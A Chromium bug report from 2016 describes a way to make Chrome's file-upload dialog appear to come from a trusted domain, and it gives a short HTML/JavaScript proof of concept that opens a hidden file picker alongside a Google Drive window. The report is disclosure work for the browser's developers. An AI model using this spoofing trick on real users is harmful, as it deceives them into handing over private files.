VULNERABILITY DETAILS
The dialogue that opens to upload files can be made to seem as if its opening from a trusted domain by triggering it to open at the same time as opening a new URL. A potential victim can be tricked into disclosing private files.
VERSION
Chrome Version: 52.0.2743.116 m (64-bit) + Stable
Operating System: Windows 8.1 64bit
REPRODUCTION CASE
------------------------------------
<style>
#q{opacity:0.0;}
</style>
<input type="file" id="q"/>
<button id="qbutt">Click me</button>
<script>
var pop;
qbutt.onclick=function(){q.click();
pop=open('https://drive.google.com/drive/my-drive',123);
}
</script>
-----------------------------------
Comment 1 by och...@chromium.org
, Aug 15 2016Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug